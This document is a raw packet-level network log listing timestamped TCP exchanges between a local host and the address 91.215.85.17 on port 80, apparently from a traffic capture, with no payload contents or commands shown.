Oct 13, 2023 15:20:51.685694933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685811996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.685866117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.685884953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686019897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686057091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686073065 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.686156988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686212063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.686269045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686358929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686419010 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.686517954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686600924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686655045 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.686682940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686718941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686774015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.686788082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686853886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.686908007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.686964035 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687000036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687047005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.687140942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687177896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687213898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687233925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.687285900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687341928 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.687390089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687477112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687515020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687527895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.687551975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687588930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687608957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.687627077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687666893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687674999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.687715054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687752008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687763929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.687850952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687866926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.687902927 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.687962055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688020945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.688044071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688119888 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688172102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.688208103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688378096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688415051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688433886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.688488960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688525915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688544989 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.688596010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688652039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.688668966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688704967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688741922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688757896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.688848019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688883066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.688905954 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.688957930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689007998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689008951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.689085960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689138889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.689165115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689223051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689270973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.689348936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689426899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689477921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.689541101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689667940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689704895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689724922 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.689815998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689872026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.689915895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.689953089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690009117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.690035105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690077066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690112114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690124989 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.690181017 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690236092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.690289021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690356970 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690412998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.690495014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690531969 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690583944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.690599918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690669060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690704107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690726995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.690818071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690855026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690872908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.690891027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.690944910 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.690958977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691054106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691088915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691109896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.691174984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691222906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691229105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.691260099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691309929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691312075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.691364050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691400051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691412926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.691472054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691505909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691520929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.691590071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691641092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.691682100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691768885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691817999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.691837072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691871881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691921949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.691945076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.691977024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692028046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.692065954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692105055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692152023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692156076 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.692219973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692269087 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.692275047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692339897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692380905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692389965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.692470074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692522049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.692545891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692610025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692652941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692656994 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.692737103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692775011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692789078 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.692892075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.692948103 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.692984104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693048954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693098068 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.693150997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693169117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693217039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.693356037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693372965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693387985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693403959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693418026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.693450928 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.693478107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693528891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693572044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693576097 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.693627119 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693675041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.693682909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693758011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693815947 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.693839073 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693891048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693908930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.693943024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.693994045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694048882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694051027 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.694088936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694133043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.694184065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694200039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694242001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.694253922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694283962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694338083 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.694387913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694403887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694447041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.694519043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694534063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694581985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694586039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.694618940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694669008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.694757938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694823027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694860935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694873095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.694921970 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.694969893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.694973946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695004940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695055008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.695064068 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695117950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695173025 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.695193052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695209980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695259094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.695308924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695348978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695393085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:51.695427895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695636988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:51.695684910 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.034003019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034032106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034048080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034064054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034080029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034147978 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.034148932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.034197092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034262896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.034313917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034358025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034415960 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.034486055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034557104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034591913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034610987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.034713030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034774065 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.034795046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034832954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034882069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.034899950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.034989119 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035043001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.035084009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035221100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035255909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035270929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.035291910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035341978 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.035362005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035430908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035476923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035492897 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.035536051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035588980 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.035605907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035641909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035676956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035692930 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.035746098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035804033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.035826921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035931110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.035979986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.036014080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036082983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036134005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.036175013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036288977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036324978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036340952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.036391020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036441088 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.036499023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036592007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036653042 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.036681890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036792040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036828041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036844969 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.036864996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036900997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.036914110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.036971092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037022114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.037080050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037147999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037209034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.037256002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037292957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037348032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.037359953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037461042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037508965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.037529945 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037597895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037648916 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.037705898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037744999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037787914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037794113 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.037836075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037874937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.037887096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.037972927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038008928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038026094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.038077116 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038132906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.038156033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038192034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038244963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.038304090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038372040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038424015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.038494110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038531065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038579941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.038651943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038686991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038748026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.038791895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038861036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.038908958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.038955927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039036989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039084911 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:52.039117098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039186954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:52.039239883 CEST	49721	80	192.168.2.5	91.215.85.17
